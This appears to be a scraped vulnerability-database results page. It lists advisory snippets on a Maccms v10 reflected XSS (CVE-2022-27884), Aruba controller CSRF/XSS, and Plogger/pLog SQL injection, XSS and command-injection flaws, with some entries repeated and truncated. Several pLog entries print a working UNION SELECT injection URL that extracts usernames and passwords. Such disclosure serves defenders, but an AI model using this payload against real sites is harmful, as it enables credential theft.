CVE-2022-27884

Maccms v10 was discovered to contain a reflected cross-site scripting XSS vulnerability in /admin.php/admin/plog/index.html via the wd parameter...

CVE-2022-27884

Maccms v10 was discovered to contain a reflected cross-site scripting XSS vulnerability in /admin.php/admin/plog/index.html via the wd parameter...

CVE-2022-27884

Maccms v10 was discovered to contain a reflected cross-site scripting XSS vulnerability in /admin.php/admin/plog/index.html via the wd parameter...

CVE-2022-27884

Maccms v10 was discovered to contain a reflected cross-site scripting XSS vulnerability in /admin.php/admin/plog/index.html via the wd parameter...

CVE-2022-27884

CVE-2022-27884 affects Maccms v10 and is a reflected cross-site scripting (XSS) vulnerability in the admin interface, specifically in /admin.php/admin/plog/index.html via the wd parameter. The root cause is insufficient input validation/escaping of user-supplied data in that parameter, enabling i...

Maccms 跨站脚本漏洞

Maccms is a PHP-based content management system CMS for film and television. v10 version of Maccms contains a cross-site scripting vulnerability, which originates from the lack of user-supplied data and output data validation filtering in the wd parameter in /admin.php/admin/plog/index.html, whic...

Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities

Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities Date: 08/016/2015 Author: Itzik Chen Product web page: http://www.arubanetworks.com Affected Version: 6.4.2.8 Tested on: Aruba7240, Ver 6.2.4.8 Summary ================ Aruba Networks is an HP company, one of the leaders in enterprise...

Plogger 3.0 - SQL Injection

GulfTech Security Research August 05, 2008 Vendor : Mike Johnson URL : http://www.plogger.org/ Version : Plogger addfile$filecontents, $row"path";...

pLog (albumId) Remote SQL Injection Vulnerability

No description provided by source. pLog albumId Remote Sql nj. DreamTurk / [email protected] Down : http://drupal.org/project/pblog http://localhost/index.php?op=ViewAlbum&albumId=-1//union//select//0,1,user,password,4,5,6,7,8 from plogusers/&blogId=1 4ever sqL L0v3r'Z Crew 2008 http://coderx.o...

plog-sql.txt

pLog albumId Remote Sql İnj. DreamTurk / [email protected] Down : http://drupal.org/project/pblog http://localhost/index.php?op=ViewAlbum&albumId=-1//union//select//0,1,user,password,4,5,6,7,8 from plogusers/&blogId=1 4ever sqL L0v3r'Z Crew 2008 http://coderx.org Greatz : Cr@zyKing & BLasTer &...

pLog (albumId) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ================================================= pLog albumId Remote SQL Injection Vulnerability ================================================= pLog albumId Remote Sql Inj...

PLog 1.0.6 - albumID SQL Injection

PLog 1.0.6 - albumID SQL Injection pLog albumId Remote Sql Ä°nj. DreamTurk / [email protected] Down : http://sourceforge.net/project/showfiles.php?groupid=83964&packageid=86556 http://localhost/index.php?op=ViewAlbum&albumId=-1//union//select//0,1,user,password,4,5,6,7,8 from plogusers/&blogId=...

Plogger exploit method! - Vulnerability warning-the black bar safety net

http://www.hackeroo.com/Plogger 是 一 款 基于 PHP 的 网络日记 程序 the. Plogger does not filter the user submits the URI of the data, exploit vulnerabilities in the WEB permissions to execute arbitrary commands. Vulnerability in'plog-admin-functions.php'script for user-submitted'configbasedir'parameter is no...

pLog register.php Multiple Parameter XSS

The remote host is running pLog, a blogging system written in PHP. The remote version of this software does not perform a proper validation of user-supplied input and is, therefore, vulnerable to a cross-site scripting attack. To exploit this flaw, an attacker would need to use the script...

[Full-Disclosure] Code Injection Vulnerability in pLog

I believe I have discovered a vulnerability in the open source blog software known as pLog. Register.php doesn't seem to check for script tags in the username or blog name fields in the account sign up form. This allows injection of potentially malicious code into the page. Since the names of blo...